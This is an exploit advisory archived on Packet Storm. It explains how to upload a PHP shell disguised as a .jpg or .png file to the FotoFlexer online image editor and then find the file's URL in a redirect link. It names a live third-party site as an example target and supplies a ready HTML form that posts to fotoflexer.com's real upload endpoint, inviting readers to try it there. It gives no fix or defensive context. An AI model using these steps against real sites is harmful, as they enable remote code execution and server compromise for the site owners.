FotoFlexer suffers from a remote shell upload vulnerability.
de59e85d4e686a5bfbfbf96dbdba9e73[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]======================================================================||
[*] Title : FotoFlexer Remote File Upload Vulnerability ||
[!] site script : http://www.fotoflexer.com ||
[!] Author : ViRuS_HiMa ||
[!] My Site : wWw.HeLL-z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||
[!] Location : Cairo-007 ||
[!]======================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] - [ ViRuS_HiMa ~ MecTruy ~ RedStorM ] ||
[!]======================================================================||
[!] Exploitation :
[!]
[!] Fotoflexer is A online images editor script . .
[!]
[!] it's allow you to upload 2 types of images : png & jpg
[!]
[!] So you can upload your file as hima.php.jpg 'or' hima.php.png
[!]
[!] but how to get your file link after uploading ??
[!]
[!] here we got alive e.g on : http://tahyeess.com/fotoflexer/default.aspx
[!]
[!] after uploading your file you will redirect to this link :
[!]
[!] http://tahyeess.com/fotoflexer/API_Loader.aspx?ff_image_url=
[!] http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg
[!] &ff_callback_url=http://www.tahyeess.com/fotoflexer/callbackTest.aspx
[!] &ff_logo_url=http://www.tahyeess.com/fotoflexer/images/logo.png
[!]
[!] yea its too long url but you can find your file link in it ! take look over here :
[!]
[!] "ff_image_url=http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg"
[!]
[!] Thats all we need :)
[!]
[!] now you should browse it from InternetExplorer :)
[!]
[!]===============================================================||
[!] do you want to try it on http://www.fotoflexer.com :) ||
[!] just use this html code to upload your file ||
[!] and you will find your link by the same method on tahyeess.com||
[!] but your file link will be some thing like this : ||
[!] ff_image_url=http://fotos.fotoflexer.com/2009/07/13/adf487e0 ||
[!]===============================================================||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>FotoFlexer - exploitation testing :)</title>
<script type="text/javascript">
/********************************
Thankx fotoflexer for helping
Me to exploit yours :p
*********************************/
var ff_image_url;
var ff_callback_url;
var ff_cancel_url;
var ff_lang;
function ff_setup(img_src){
ff_image_url = img_src;
ff_callback_url = "http://fotoflexer.com/API/callbackTest.php";
ff_cancel_url = "http://fotoflexer.com";
ff_lang = "en-US";
ff_activate();
}
</script>
<script type="text/javascript"
src="http://fotoflexer.com/API/ff_api_v1_01.js">
</script>
</head>
<body style="text-align: center;">
<div style="width: 650px; margin: 0 auto;">
<p style="text-align: left;"><a href="/api.php">Back to FotoFlexer API</a></p>
<h2>FotoFlexer - Exploitation Testing :)</h2>
<p style="text-align: left;">this code was already writen by fotoflexer team and edited by ViRuS_HiMa to be decent .</p>
<p style="text-align: left;">[H]eL[L] [Z]on[E] [C]re[W] - [ ViRuS_HiMa ~ MecTruy ~ RedStorM ]</p>
<hr />
<h4>Click An Image To Edit:</h4>
<div>
<img style="cursor:pointer;width:60px;height:60px;padding:10px;"
src="http://fotoflexer.com/images/moon_sample.jpg"
id="http://fotoflexer.com/samples/moon.jpg"
onclick="ff_setup(this.id)" />
<img style="cursor:pointer;width:60px;height:60px;padding:10px;"
src="http://fotoflexer.com/images/sunflower_sample.jpg"
id="http://fotoflexer.com/samples/sunflower.jpg"
onclick="ff_setup(this.id)" />
<img style="cursor:pointer;width:60px;height:60px;padding:10px;"
src="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif"
id="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif"
onclick="ff_setup(this.id)" />
</div>
<hr />
<h4>Or, Upload An Image To Edit:</h4>
<!--Pass the Callback URL as "CB" and the logo URL as "Logo"-->
<form enctype="multipart/form-data"
action="http://fotoflexer.com/API/API_Upload.php" method="post">
<p><input name="userfile" type="file" /><br />
<input type="hidden" name="Logo" value="http://www.fotoflexer.com/images/header.gif" />
<input type="hidden" name="CB" value="http://www.fotoflexer.com/API/callbackTest.php" />
<input type="submit" value="Upload" /></p>
</form>
</div>
</body>
</html>
[*]===================================================================||
[!] Greetz 2 Allah - Muslim Hackers - Str0ke - And oTherz . ||
[*]===================================================================||
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!